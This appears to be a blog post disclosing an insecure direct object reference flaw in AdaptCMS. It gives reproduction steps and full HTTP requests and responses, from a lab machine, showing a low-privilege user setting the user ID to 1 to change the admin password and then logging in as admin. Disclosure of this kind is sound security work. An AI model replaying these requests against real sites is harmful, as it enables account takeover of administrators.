- It was noted that the application was vulnerable to IDOR via the password change functionality resulting in low privilege user being able to change the "admin" password
IDOR "Change Password" Functionality #1:
Steps to Reproduce:
- Login as user with low privilege and visit profile page
- Select "Edit Your Profile" and click "Submit"
- Trap the HTTP POST request
- Set "data[User][password]" and "data[User][password_confirm]" values "Passw0rd!"
- Set "data[User][id]" value to "1"
- This would change the password of the "admin" account
// HTTP POST request changing password
POST /adaptcms/users/edit HTTP/1.1
Host: 192.168.58.131
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
[...]
[...]
4d63437ebea6a2ef6648b29cc1c43ea70600295a
------WebKitFormBoundaryDvhxmc78yz9KfFbn
Content-Disposition: form-data; name="data[User][password]"
Passw0rd!
------WebKitFormBoundaryDvhxmc78yz9KfFbn
Content-Disposition: form-data; name="data[User][password_confirm]"
Passw0rd!
------WebKitFormBoundaryDvhxmc78yz9KfFbn
Content-Disposition: form-data; name="data[User][email]"
privesc-test@test.test
------WebKitFormBoundaryDvhxmc78yz9KfFbn
Content-Disposition: form-data; name="data[User][id]"
1
------WebKitFormBoundaryDvhxmc78yz9KfFbn
[...]
// HTTP Response
HTTP/1.1 200 OK
Date: Fri, 30 May 2025 19:56:17 GMT
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3
X-Powered-By: PHP/5.6.40
Content-Length: 13925
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
// HTTP POST request logging in with admin account
POST /adaptcms/login HTTP/1.1
Host: 192.168.58.131
Content-Length: 262
Cache-Control: max-age=0
Accept-Language: en-GB,en;q=0.9
Origin: http://192.168.58.131
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
[...]
_method=POST&data[_Token][key]=dc18f92e4d0b810c603f45f2189b220de543a972&data[User][username]=admin&data[User][password]=Passw0rd!&data[_Token][fields]=5ba74a784fe0258a12c30194ef6a09b97a86bb1d%3A&data[_Token][unlocked]=
// HTTP Response
HTTP/1.1 302 Found
Date: Fri, 30 May 2025 19:56:33 GMT
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3
X-Powered-By: PHP/5.6.40
Set-Cookie: adaptcms=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: adaptcms=2aaosqqksob20a98viieaq8j44; expires=Mon, 02-Jun-2025 19:56:33 GMT; Max-Age=259200; path=/; HttpOnly
Location: http://192.168.58.131/adaptcms/admin
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
No comments:
Post a Comment